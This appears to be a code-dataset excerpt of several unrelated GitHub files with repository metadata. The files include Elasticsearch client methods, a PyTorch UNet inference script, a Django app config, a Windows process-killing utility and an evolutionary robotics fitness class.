:arg max_concurrent_shard_requests: The number of concurrent
shard requests per node this search executes concurrently. This value
should be used to limit the impact of the search on the cluster in order
to limit the number of concurrent shard requests Default: 5
:arg pre_filter_shard_size: A threshold that enforces a pre-
filter roundtrip to prefilter search shards based on query rewriting if
the number of shards the search request expands to exceeds the
threshold. This filter roundtrip can limit the number of shards
significantly if for instance a shard can not match any documents based
on it's rewrite method ie. if date filters are mandatory to match but
the shard bounds and the query are disjoint. Default: 128
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg q: Query in the Lucene query string syntax
:arg request_cache: Specify if request cache should be used for
this request or not, defaults to index level setting
:arg rest_total_hits_as_int: Indicates whether hits.total should
be rendered as an integer or an object in the rest search response
:arg routing: A comma-separated list of specific routing values
:arg scroll: Specify how long a consistent view of the index
should be maintained for scrolled search
:arg search_type: Search operation type Valid choices:
query_then_fetch, dfs_query_then_fetch
:arg seq_no_primary_term: Specify whether to return sequence
number and primary term of the last modification of each hit
:arg size: Number of hits to return (default: 10)
:arg sort: A comma-separated list of <field>:<direction> pairs
:arg stats: Specific 'tag' of the request for logging and
statistical purposes
:arg stored_fields: A comma-separated list of stored fields to
return as part of a hit
:arg suggest_field: Specify which field to use for suggestions
:arg suggest_mode: Specify suggest mode Valid choices: missing,
popular, always Default: missing
:arg suggest_size: How many suggestions to return in response
:arg suggest_text: The source text for which the suggestions
should be returned
:arg terminate_after: The maximum number of documents to collect
for each shard, upon reaching which the query execution will terminate
early.
:arg timeout: Explicit operation timeout
:arg track_scores: Whether to calculate and return scores even
if they are not used for sorting
:arg track_total_hits: Indicate if the number of documents that
match the query should be tracked
:arg typed_keys: Specify whether aggregation and suggester names
should be prefixed by their respective types in the response
:arg version: Specify whether to return document version as part
of a hit
"""
# from is a reserved word so it cannot be used, use from_ instead
if "from_" in params:
params["from"] = params.pop("from_")
return self.transport.perform_request(
"GET", _make_path(index, doc_type, "_search"), params=params, body=body
)
@query_params(
"allow_no_indices",
"expand_wildcards",
"ignore_unavailable",
"local",
"preference",
"routing",
)
def search_shards(self, index=None, params=None):
"""
Returns information about the indices and shards that a search request would be
executed against.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-shards.html>`_
:arg index: A comma-separated list of index names to search; use
`_all` or empty string to perform the operation on all indices
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg local: Return local information, do not retrieve the state
from master node (default: false)
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg routing: Specific routing value
"""
return self.transport.perform_request(
"GET", _make_path(index, "_search_shards"), params=params
)
@query_params(
"allow_no_indices",
"expand_wildcards",
"explain",
"ignore_throttled",
"ignore_unavailable",
"preference",
"profile",
"rest_total_hits_as_int",
"routing",
"scroll",
"search_type",
"typed_keys",
)
def search_template(self, body, index=None, doc_type=None, params=None):
"""
Allows to use the Mustache language to pre-render a search definition.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-template.html>`_
:arg body: The search definition template and its params
:arg index: A comma-separated list of index names to search; use
`_all` or empty string to perform the operation on all indices
:arg doc_type: A comma-separated list of document types to
search; leave empty to perform the operation on all types
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg explain: Specify whether to return detailed information
about score computation as part of a hit
:arg ignore_throttled: Whether specified concrete, expanded or
aliased indices should be ignored when throttled
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg profile: Specify whether to profile the query execution
:arg rest_total_hits_as_int: Indicates whether hits.total should
be rendered as an integer or an object in the rest search response
:arg routing: A comma-separated list of specific routing values
:arg scroll: Specify how long a consistent view of the index
should be maintained for scrolled search
:arg search_type: Search operation type Valid choices:
query_then_fetch, query_and_fetch, dfs_query_then_fetch,
dfs_query_and_fetch
:arg typed_keys: Specify whether aggregation and suggester names
should be prefixed by their respective types in the response
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request(
"GET",
_make_path(index, doc_type, "_search", "template"),
params=params,
body=body,
)
@query_params(
"field_statistics",
"fields",
"offsets",
"payloads",
"positions",
"preference",
"realtime",
"routing",
"term_statistics",
"version",
"version_type",
)
def termvectors(self, index, body=None, doc_type=None, id=None, params=None):
"""
Returns information and statistics about terms in the fields of a particular
document.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-termvectors.html>`_
:arg index: The index in which the document resides.
:arg body: Define parameters and or supply a document to get
termvectors for. See documentation.
:arg doc_type: The type of the document.
:arg id: The id of the document, when not specified a doc param
should be supplied.
:arg field_statistics: Specifies if document count, sum of
document frequencies and sum of total term frequencies should be
returned. Default: True
:arg fields: A comma-separated list of fields to return.
:arg offsets: Specifies if term offsets should be returned.
Default: True
:arg payloads: Specifies if term payloads should be returned.
Default: True
:arg positions: Specifies if term positions should be returned.
Default: True
:arg preference: Specify the node or shard the operation should
be performed on (default: random).
:arg realtime: Specifies if request is real-time as opposed to
near-real-time (default: true).
:arg routing: Specific routing value.
:arg term_statistics: Specifies if total term frequency and
document frequency should be returned.
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'index'.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"GET",
_make_path(index, doc_type, id, "_termvectors"),
params=params,
body=body,
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"if_primary_term",
"if_seq_no",
"lang",
"refresh",
"retry_on_conflict",
"routing",
"timeout",
"wait_for_active_shards",
)
def update(self, index, id, body, doc_type=None, params=None):
"""
Updates a document with a script or partial document.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-update.html>`_
:arg index: The name of the index
:arg id: Document ID
:arg body: The request definition requires either `script` or
partial `doc`
:arg doc_type: The type of the document
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg if_primary_term: only perform the update operation if the
last operation that has changed the document has the specified primary
term
:arg if_seq_no: only perform the update operation if the last
operation that has changed the document has the specified sequence
number
:arg lang: The script language (default: painless)
:arg refresh: If `true` then refresh the effected shards to make
this operation visible to search, if `wait_for` then wait for a refresh
to make this operation visible to search, if `false` (the default) then
do nothing with refreshes. Valid choices: true, false, wait_for
:arg retry_on_conflict: Specify how many times should the
operation be retried when a conflict occurs (default: 0)
:arg routing: Specific routing value
:arg timeout: Explicit operation timeout
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the update operation.
Defaults to 1, meaning the primary shard only. Set to `all` for all
shard copies, otherwise set to any non-negative value less than or equal
to the total number of copies for the shard (number of replicas + 1)
"""
for param in (index, id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"POST", _make_path(index, doc_type, id, "_update"), params=params, body=body
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"allow_no_indices",
"analyze_wildcard",
"analyzer",
"conflicts",
"default_operator",
"df",
"expand_wildcards",
"from_",
"ignore_unavailable",
"lenient",
"max_docs",
"pipeline",
"preference",
"q",
"refresh",
"request_cache",
"requests_per_second",
"routing",
"scroll",
"scroll_size",
"search_timeout",
"search_type",
"size",
"slices",
"sort",
"stats",
"terminate_after",
"timeout",
"version",
"version_type",
"wait_for_active_shards",
"wait_for_completion",
)
def update_by_query(self, index, body=None, doc_type=None, params=None):
"""
Performs an update on every document in the index without changing the source,
for example to pick up a mapping change.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-update-by-query.html>`_
:arg index: A comma-separated list of index names to search; use
`_all` or empty string to perform the operation on all indices
:arg body: The search definition using the Query DSL
:arg doc_type: A comma-separated list of document types to
search; leave empty to perform the operation on all types
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg analyze_wildcard: Specify whether wildcard and prefix
queries should be analyzed (default: false)
:arg analyzer: The analyzer to use for the query string
:arg conflicts: What to do when the update by query hits version
conflicts? Valid choices: abort, proceed Default: abort
:arg default_operator: The default operator for query string
query (AND or OR) Valid choices: AND, OR Default: OR
:arg df: The field to use as default where no field prefix is
given in the query string
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg from_: Starting offset (default: 0)
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg lenient: Specify whether format-based query failures (such
as providing text to a numeric field) should be ignored
:arg max_docs: Maximum number of documents to process (default:
all documents)
:arg pipeline: Ingest pipeline to set on index requests made by
this action. (default: none)
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg q: Query in the Lucene query string syntax
:arg refresh: Should the effected indexes be refreshed?
:arg request_cache: Specify if request cache should be used for
this request or not, defaults to index level setting
:arg requests_per_second: The throttle to set on this request in
sub-requests per second. -1 means no throttle.
:arg routing: A comma-separated list of specific routing values
:arg scroll: Specify how long a consistent view of the index
should be maintained for scrolled search
:arg scroll_size: Size on the scroll request powering the update
by query
:arg search_timeout: Explicit timeout for each search request.
Defaults to no timeout.
:arg search_type: Search operation type Valid choices:
query_then_fetch, dfs_query_then_fetch
:arg size: Deprecated, please use `max_docs` instead
:arg slices: The number of slices this task should be divided
into. Defaults to 1 meaning the task isn't sliced into subtasks.
Default: 1
:arg sort: A comma-separated list of <field>:<direction> pairs
:arg stats: Specific 'tag' of the request for logging and
statistical purposes
:arg terminate_after: The maximum number of documents to collect
for each shard, upon reaching which the query execution will terminate
early.
:arg timeout: Time each individual bulk request should wait for
shards that are unavailable. Default: 1m
:arg version: Specify whether to return document version as part
of a hit
:arg version_type: Should the document increment the version
number (internal) on hit or not (reindex)
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the update by query
operation. Defaults to 1, meaning the primary shard only. Set to `all`
for all shard copies, otherwise set to any non-negative value less than
or equal to the total number of copies for the shard (number of replicas
+ 1)
:arg wait_for_completion: Should the request should block until
the update by query operation is complete. Default: True
"""
# from is a reserved word so it cannot be used, use from_ instead
if "from_" in params:
params["from"] = params.pop("from_")
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'index'.")
return self.transport.perform_request(
"POST",
_make_path(index, doc_type, "_update_by_query"),
params=params,
body=body,
)
@query_params("requests_per_second")
def update_by_query_rethrottle(self, task_id, params=None):
"""
Changes the number of requests per second for a particular Update By Query
operation.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-update-by-query.html>`_
:arg task_id: The task id to rethrottle
:arg requests_per_second: The throttle to set on this request in
floating sub-requests per second. -1 means set no throttle.
"""
if task_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'task_id'.")
return self.transport.perform_request(
"POST",
_make_path("_update_by_query", task_id, "_rethrottle"),
params=params,
)
| [
"hourui@qianmi.com"
] | hourui@qianmi.com |
1e6958f73021d78c7be222fe32a1d093a81b815d | 0e5e3cce9bde498f1bd2d1fcbc46cf69ee36f35c | /inference_color.py | c4c2d35d7ab12c0530d0ed59ea5cc3621ae8616a | [
"Apache-2.0"
] | permissive | ljhclover/pytorch_Unet_CZI | f61d444a16fd70d29a7927541ba3a10a73577241 | 92a3c295077562161d747157fdcba998132d4a94 | refs/heads/main | 2023-03-23T06:03:04.627802 | 2021-03-17T11:23:58 | 2021-03-17T11:23:58 | 348,678,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,215 | py | # -*- coding: utf-8 -*-
# @Time : 2020-09-20 17:44
# @Author : lijinghu
# @Email : ljhclover@hotmail.com
# @File : inference.py
"""
"""
import argparse
import logging
import os
import os.path as osp
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
import numpy as np
import torch
import torch.nn.functional as F
from torchvision import transforms
from PIL import Image
from tqdm import tqdm
import cv2
from unet import NestedUNet
from unet import UNet
from utils.dataset import BasicDataset
from utils.colors import get_colors
from config import UNetConfig
cfg = UNetConfig()
def inference_one(net, image, device):
    """Run one forward pass of *net* on *image* and return thresholded mask(s).

    Returns a single boolean H x W array when cfg.n_classes == 1, otherwise a
    list with one boolean array per class channel, all resized back to the
    input image's resolution.
    """
    net.eval()
    # Preprocess to a 1 x C x H x W float tensor on the target device.
    batch = torch.from_numpy(BasicDataset.preprocess(image, cfg.scale)).unsqueeze(0)
    batch = batch.to(device=device, dtype=torch.float32)

    with torch.no_grad():
        logits = net(batch)
        if cfg.deepsupervision:
            # Deep supervision yields one output per decoder depth; use the last.
            logits = logits[-1]

        if cfg.n_classes > 1:
            probs = F.softmax(logits, dim=1)
        else:
            probs = torch.sigmoid(logits)
        probs = probs.squeeze(0)  # C x H x W

        # Resize probability maps back to the original image resolution.
        back_to_input_size = transforms.Compose(
            [
                transforms.ToPILImage(),
                transforms.Resize((image.size[1], image.size[0])),
                transforms.ToTensor(),
            ]
        )

        if cfg.n_classes == 1:
            resized = back_to_input_size(probs.cpu())
            mask = resized.squeeze().cpu().numpy()
            return mask > cfg.out_threshold

        return [
            back_to_input_size(channel.cpu()).squeeze().cpu().numpy() > cfg.out_threshold
            for channel in probs
        ]
def get_args():
    """Build the inference CLI parser and parse ``sys.argv``."""
    parser = argparse.ArgumentParser(
        description='Predict masks from input images',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    parser.add_argument(
        '--model', '-m',
        default='MODEL.pth',
        metavar='FILE',
        help="Specify the file in which the model is stored",
    )
    parser.add_argument(
        '--input', '-i',
        dest='input',
        type=str,
        default='',
        help='Directory of input images',
    )
    parser.add_argument(
        '--output', '-o',
        dest='output',
        type=str,
        default='',
        help='Directory of ouput images',
    )
    return parser.parse_args()
if __name__ == "__main__":
    args = get_args()
    input_imgs = os.listdir(args.input)
    # HACK: instantiate the model class named in the config via eval();
    # safe only because cfg.model comes from trusted local config, but a
    # lookup table {"UNet": UNet, "NestedUNet": NestedUNet} would be safer.
    net = eval(cfg.model)(cfg)
    logging.info("Loading model {}".format(args.model))
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    logging.info(f'Using device {device}')
    net.to(device=device)
    net.load_state_dict(torch.load(args.model, map_location=device))
    logging.info("Model loaded !")
    # Predict each image in the input directory and write the result under
    # <output>/<image-name-without-extension>/<image-name>.
    for i, img_name in tqdm(enumerate(input_imgs)):
        logging.info("\nPredicting image {} ...".format(img_name))
        img_path = osp.join(args.input, img_name)
        print(img_name)
        img = Image.open(img_path)
        mask = inference_one(net=net,
                             image=img,
                             device=device)
        img_name_no_ext = osp.splitext(img_name)[0]
        output_img_dir = osp.join(args.output, img_name_no_ext)
        os.makedirs(output_img_dir, exist_ok=True)
        if cfg.n_classes == 1:
            # Binary mask: write as a single grayscale image (0/255).
            image_idx = Image.fromarray((mask * 255).astype(np.uint8))
            image_idx.save(osp.join(output_img_dir, img_name))
        else:
            # Multi-class: paint each class channel with its own color, then
            # alpha-blend the color mask over the original image.
            colors = get_colors(n_classes=cfg.n_classes)
            w, h = img.size
            img_mask = np.zeros([h, w, 3], np.uint8)
            for idx in range(0, len(mask)):
                image_idx = Image.fromarray((mask[idx] * 255).astype(np.uint8))
                array_img = np.asarray(image_idx)
                img_mask[np.where(array_img==255)] = colors[idx]
            # OpenCV works in BGR order, so convert before blending/writing.
            img = cv2.cvtColor(np.asarray(img),cv2.COLOR_RGB2BGR)
            img_mask = cv2.cvtColor(np.asarray(img_mask),cv2.COLOR_RGB2BGR)
            output = cv2.addWeighted(img, 0.7, img_mask, 0.3, 0)
            cv2.imwrite(osp.join(output_img_dir, img_name), output)
| [
"noreply@github.com"
] | noreply@github.com |
f0501c3bc093969d279619ced31bd78ea5fcd12d | a6be7f8c42e6d8033658f559752b79f2dd06b771 | /sutter_hospital/ourdocters/apps.py | 87f1ba62653e12ad79e3ea40fc8a6fda31473137 | [] | no_license | Satwik1112/hospital_website | c14dd872bdfd22323fb955b870cedc4e38418859 | ab10dc3d53cf185d463507e4e9f145721584b0a1 | refs/heads/main | 2023-07-13T02:18:38.184112 | 2021-09-01T17:03:18 | 2021-09-01T17:03:18 | 402,112,873 | 0 | 0 | null | 2021-09-01T17:02:37 | 2021-09-01T15:34:29 | null | UTF-8 | Python | false | false | 158 | py | from django.apps import AppConfig
class OurdoctersConfig(AppConfig):
    """Django application configuration for the ``ourdocters`` app."""

    # Use 64-bit auto-incrementing primary keys by default (Django 3.2+).
    default_auto_field = 'django.db.models.BigAutoField'
    # Dotted path / label of the application this config applies to.
    name = 'ourdocters'
| [
"noreply@github.com"
] | noreply@github.com |
e6e0fd0c21c64460b18b4b981deca3ff29fb54c6 | 19c922ca909820bea23fb1e9a9e3080d044eb826 | /Chinese Phonology/dicts/shijingPartDict.py | 42664f4c2b23854326adf0fc9653262bdbf6d639 | [] | no_license | philneal/Eohan | 49d0465a889788fa272d61eba60b5d5447bb1a68 | 405a91ebf75846bf5b40c83815753508c251433a | refs/heads/master | 2016-09-06T10:54:30.392054 | 2015-06-18T07:39:21 | 2015-06-18T07:39:21 | 37,643,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | (dp0
I0
V\u570b\u98a8\u4e00
p1
sI1
V\u5c0f\u96c5\u4e8c
p2
sI2
V\u5927\u96c5\u4e09
p3
sI3
V\u5468\u980c\u56db\u4e4b\u4e00
p4
s. | [
"philipneal@hotmail.com"
] | philipneal@hotmail.com |
e98221ca4eca525cea8ec9b4a9a867b7f179168a | bb9bee0ee44f63fb81ce3c12080bcfa2552e0a49 | /main.py | 714fb6ff34e735d0feb1eb6d854555e3f74abd06 | [] | no_license | hodgej/python-task-controller | 9fa2cf872f6361c2b1bbf34af8f038947aeff3b3 | 027ca5e08a3e1c46a4dde6e9feffd8427efc8805 | refs/heads/master | 2022-04-26T00:43:36.180036 | 2020-05-03T19:34:30 | 2020-05-03T19:34:30 | 261,006,093 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,475 | py | import os
import subprocess
import time
from threading import Thread
import ctypes
# Windows-only: load the Win32 DLLs used to hide the console window when a
# background (recursive) kill is started.
kernel32 = ctypes.WinDLL('kernel32')
user32 = ctypes.WinDLL('user32')
# ShowWindow() command value that hides the window (winuser.h SW_HIDE).
SW_HIDE = 0
# Handle to this process's console window (0/NULL if there is none).
hWnd = kernel32.GetConsoleWindow()
def get_tasks(action):
    """Query the running processes via the Windows `tasklist` command.

    :param action: "list" returns the raw output lines, "length" returns the
        number of output lines.
    :returns: list of str, or int, depending on *action*.
    :raises ValueError: for any other *action* value.
    """
    # Use a `with` block so the pipe is closed deterministically
    # (the original leaked the popen file object).
    with os.popen('tasklist') as pipe:
        # Renamed from `list`, which shadowed the builtin.
        tasks = pipe.read().strip().split('\n')
    if action == "length":
        return len(tasks)
    if action == "list":
        return tasks
    raise ValueError("Invalid input to 'get_tasks' on argument 'action'.")
def kill_task(task):
    """Force-kill every process whose image name matches *task* (Windows TASKKILL)."""
    os.system(r"TASKKILL /F /IM %s" % task)
def recursive_kill(task):
    """Poll the task list once per second and force-kill *task* whenever seen.

    Runs forever; intended to be started on a background thread.
    """
    while True:
        time.sleep(1)
        lines = os.popen('tasklist').read().strip().split('\n')
        # TASKKILL /F /IM kills every instance of the image at once, so one
        # call per poll suffices (the original issued one kill per matching
        # output line, re-killing an already-dead image name).
        if any(task in line for line in lines):
            kill_task(task)
            print("killed")
def home():
    """Interactive command loop for inspecting and killing Windows tasks.

    Supported commands: list, list_len, kill <app>, recursive_kill <app>...,
    stop (exits the loop).
    """
    # Loop instead of recursing: the original called home() after every
    # command, growing the call stack without bound in a long session.
    while True:
        raw = input("Valid Commands: 'list', 'list_len', 'kill *app*', 'recursive_kill' *app*, 'stop'\n")
        parts = raw.split(" ")
        cmd = parts[0]
        if cmd == "stop":
            # BUG FIX: 'stop' was advertised but never handled, so the loop
            # could not be exited cleanly.
            return
        if cmd == "list":
            print(get_tasks("list"))
        elif cmd == "list_len":
            print(get_tasks("length"))
        elif cmd == "kill":
            kill_task(parts[1])
        elif cmd == "recursive_kill":
            if hWnd:
                user32.ShowWindow(hWnd, SW_HIDE)
            # BUG FIX: pass the callable and its argument to Thread; the old
            # code did Thread(target=recursive_kill(i)), which *called* the
            # infinite loop inline and blocked forever. Also iterate over all
            # supplied app names instead of only parts[1].
            for name in parts[1:]:
                Thread(target=recursive_kill, args=(name,)).start()
        else:
            print("Invalid Input")
home() | [
"noreply@github.com"
] | noreply@github.com |
31016d76561425d939332319e1c3c3f3630350a1 | 5808f74f1825919da58ae91829ff4516623eb79d | /2020/new_python_concepts/02_floats.py | 00d580b96499450bff11db1b8e67cafef9cebf04 | [
"MIT"
] | permissive | hygull/stkovrflw | e2d78c8614b8d9646e3458926d71d13dfa75e2d4 | f341727c7e42b6e667345f12814ab1f2479f1b89 | refs/heads/master | 2023-07-19T11:56:45.818534 | 2022-03-19T18:13:47 | 2022-03-19T18:13:47 | 132,311,923 | 0 | 1 | MIT | 2023-07-16T21:27:08 | 2018-05-06T06:10:14 | Python | UTF-8 | Python | false | false | 254 | py | def func(p1: float, p2: float) -> float:
print(p1 + p2)
# return None
"""
floats.py:3: error: Incompatible return value type (got "None", expected "float")
Found 1 error in 1 file (checked 2 source files)
"""
return p1 + p2
| [
"rishikesh0014051992@gmail.com"
] | rishikesh0014051992@gmail.com |
fb940c955be5b66b7cac6e43e4945aa5f53ec126 | 53deeaa922f10a159bdb6f31f0caed00c5607527 | /robotics/individual.py | a261a1cc5f5c208d42f13f841f0e99081bfd31df | [] | no_license | atbarnes/robotics | 679b95852953dc4193fc6f343c888e99a139b5cf | 4776915559c534977b4ebbb6570cc56ae3c3e44b | refs/heads/master | 2020-06-08T00:06:07.407724 | 2019-06-21T15:45:07 | 2019-06-21T15:45:07 | 193,120,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,841 | py | import random
import pyrosim
import math
import numpy
from robot import ROBOT
import constants as c
class INDIVIDUAL:
def __init__(self, i):
self.genome = 2 * numpy.random.random_sample((13, 8)) - 1
self.fitness = 0
self.distanceCar1 = 0
self.distanceCar2 = 0
self.progress1 = 0
self.progress2 = 0
self.ID = i
    def Start_Evaluation(self, env, pp, pb):
        # Launch a pyrosim simulation of this individual's robot in
        # environment `env`; `pp`/`pb` toggle play_paused / play_blind.
        # The simulation runs asynchronously until Compute_Fitness() joins it.
        self.sim = pyrosim.Simulator(play_blind = pb, play_paused = pp, eval_time = c.evalTime)
        self.robot = ROBOT(self.sim, self.genome)
        env.Send_To(self.sim)
        self.sim.start()
    def Compute_Fitness(self):
        # Join the simulation started by Start_Evaluation(), then score this
        # individual: both cars (L6, L7) should approach their respective
        # target objects (L4, L5) by a similar amount, while the light sensor
        # (L8) rewards ending near the light source. Fitness is
        # (progress1 * progress2 / |progress1 - progress2|) * light, or 0 if
        # neither car made progress.
        self.sim.wait_to_finish()
        # NOTE(review): `t` is unused — leftover from the commented-out
        # per-timestep scoring experiment below.
        t = 0
        #object positions
        x1 = self.sim.get_sensor_data( sensor_id = self.robot.L4, svi=0)
        y1 = self.sim.get_sensor_data( sensor_id = self.robot.L4, svi=1)
        x2 = self.sim.get_sensor_data( sensor_id = self.robot.L5, svi=0)
        y2 = self.sim.get_sensor_data( sensor_id = self.robot.L5, svi=1)
        #car positions
        x3 = self.sim.get_sensor_data( sensor_id = self.robot.L6, svi=0)
        y3 = self.sim.get_sensor_data( sensor_id = self.robot.L6, svi=1)
        x4 = self.sim.get_sensor_data( sensor_id = self.robot.L7, svi=0)
        y4 = self.sim.get_sensor_data( sensor_id = self.robot.L7, svi=1)
        light = self.sim.get_sensor_data( sensor_id = self.robot.L8)
        #first time step
        xval = x1[0]
        yval = y1[0]
        x2val = x2[0]
        y2val = y2[0]
        x3val = x3[0]
        y3val = y3[0]
        x4val = x4[0]
        y4val = y4[0]
        #last time step
        xval2 = x1[-1]
        yval2 = y1[-1]
        x2val2 = x2[-1]
        y2val2 = y2[-1]
        x3val2 = x3[-1]
        y3val2 = y3[-1]
        x4val2 = x4[-1]
        y4val2 = y4[-1]
        #calculate distance
        # Euclidean car-to-object distances at the first and last time steps.
        distance1 = math.sqrt( (x3val - xval)**2 + (y3val - yval)**2 )
        distance2 = math.sqrt( (x4val - x2val)**2 + (y4val - y2val)**2 )
        distance3 = math.sqrt( (x3val2 - xval2)**2 + (y3val2 - yval2)**2 )
        distance4 = math.sqrt( (x4val2 - x2val2)**2 + (y4val2 - y2val2)**2 )
        #find if car made progress from last time step
        self.distanceCar1 = distance1 - distance3
        self.distanceCar2 = distance2 - distance4
        #Difference in progress between both cars
        offset = abs(self.distanceCar1 - self.distanceCar2)
        #If difference is below one, just make it one
        if (offset < 1):
            offset = 1
        if (self.distanceCar1 < 0 and self.distanceCar2 < 0):
            self.fitness = 0
            #if one car isn't making progress, make offset high
            #if (self.distanceCar1 < 0 or self.distanceCar2 < 0):
                #offset = 10
        else:
            self.fitness = ((self.distanceCar1 * self.distanceCar2)/offset) * light[-1]
        output = ('fitness:{: 3.3f}, d:{: 3.3f}, light:{: 3.1f}, offset:{: 3.1f}').format(self.fitness, self.distanceCar1, light[-1], offset)
        output2 = ('fitness:{: 3.3f},d:{: 3.3f}, light:{: 3.1f}, offset:{: 3.1f}').format(self.fitness, self.distanceCar2, light[-1], offset)
        # NOTE: Python 2 print statements — this module targets Python 2.
        print output + "\n"
        print output2 + "\n"
        # The block below is a retained per-timestep scoring experiment
        # (accumulating progress every step instead of endpoints only).
        #for t in range(c.evalTime):
            #object positions
            #x1 = self.sim.get_sensor_data( sensor_id = self.robot.L4, svi=0)
            #y1 = self.sim.get_sensor_data( sensor_id = self.robot.L4, svi=1)
            #x2 = self.sim.get_sensor_data( sensor_id = self.robot.L5, svi=0)
            #y2 = self.sim.get_sensor_data( sensor_id = self.robot.L5, svi=1)
            #car positions
            #x3 = self.sim.get_sensor_data( sensor_id = self.robot.L6, svi=0)
            #y3 = self.sim.get_sensor_data( sensor_id = self.robot.L6, svi=1)
            #x4 = self.sim.get_sensor_data( sensor_id = self.robot.L7, svi=0)
            #y4 = self.sim.get_sensor_data( sensor_id = self.robot.L7, svi=1)
            #light = self.sim.get_sensor_data( sensor_id = self.robot.L8)
            #this time step
            #xval = x1[t]
            #yval = y1[t]
            #x2val = x2[t]
            #y2val = y2[t]
            #x3val = x3[t]
            #y3val = y3[t]
            #x4val = x4[t]
            #y4val = y4[t]
            #next time step
            #if(t != c.evalTime - 1):
                #xval2 = x1[t+1]
                #yval2 = y1[t+1]
                #x2val2 = x2[t+1]
                #y2val2 = y2[t+1]
                #x3val2 = x3[t+1]
                #y3val2 = y3[t+1]
                #x4val2 = x4[t+1]
                #y4val2 = y4[t+1]
            #calculate distance for each time step
            #distance1 = math.sqrt( (x3val - xval)**2 + (y3val - yval)**2 )
            #distance2 = math.sqrt( (x4val - x2val)**2 + (y4val - y2val)**2 )
            #distance3 = math.sqrt( (x3val2 - xval2)**2 + (y3val2 - yval2)**2 )
            #distance4 = math.sqrt( (x4val2 - x2val2)**2 + (y4val2 - y2val2)**2 )
            #find if car made progress from last time step
            #self.distanceCar1 += (distance1 - distance3)
            #self.distanceCar2 += (distance2 - distance4)
            #if(distance1 - distance3 > 0):
                #self.progress1 += 1
            #if(distance2 - distance4 > 0):
                #self.progress2 += 1
            #output = ('Distance 1: {:3d}:: d:{: 3.3f}, progress:{: 3.1f}, light:{: 3.1f}').format(t, self.distanceCar1, self.progress1, light[-1])
            #output2 = ('Distance 2: {:3d}:: d:{: 3.3f}, progress:{: 3.1f}, light:{: 3.1f}').format(t, self.distanceCar2, self.progress2, light[-1])
            #output = ('Object 1: {:3d}:: x:{: 3.1f}, y:{: 3.1f},').format(t, xval, yval)
            #output2 = ('Object 2:{:3d}:: x:{: 3.1f}, y:{: 3.1f},').format(t, x2val, y2val)
            #output3 = ('Car 1:{:3d}:: x:{: 3.1f}, y:{: 3.1f},').format(t, x3val, y3val)
            #output4 = ('Car 2:{:3d}:: x:{: 3.1f}, y:{: 3.1f},').format(t, x4val, y4val)
            #print output + "\n"
            #print output2 + "\n"
            #print output3 + "\n"
            #print output4 + "\n"
        #self.fitness = (self.distanceCar1 + self.distanceCar2) * light[-1] * 1/
        # Release the simulator and robot so the next evaluation starts clean.
        del self.sim
        del self.robot
def Mutate(self):
geneToMutate = random.randint(0, 9)
geneToMutate2 = random.randint(0, 7)
self.genome[geneToMutate][geneToMutate2] = abs(random.gauss(self.genome[geneToMutate][geneToMutate2], math.fabs(self.genome[geneToMutate][geneToMutate2])))
if(self.genome[geneToMutate][geneToMutate2] > 1):
self.genome[geneToMutate][geneToMutate2] = 1
if(self.genome[geneToMutate][geneToMutate2] < -1):
self.genome[geneToMutate][geneToMutate2] = -1
def Print(self):
print(" ["),
print(self.ID),
print(self.fitness),
print("] "),
print()
| [
"noreply@github.com"
] | noreply@github.com |
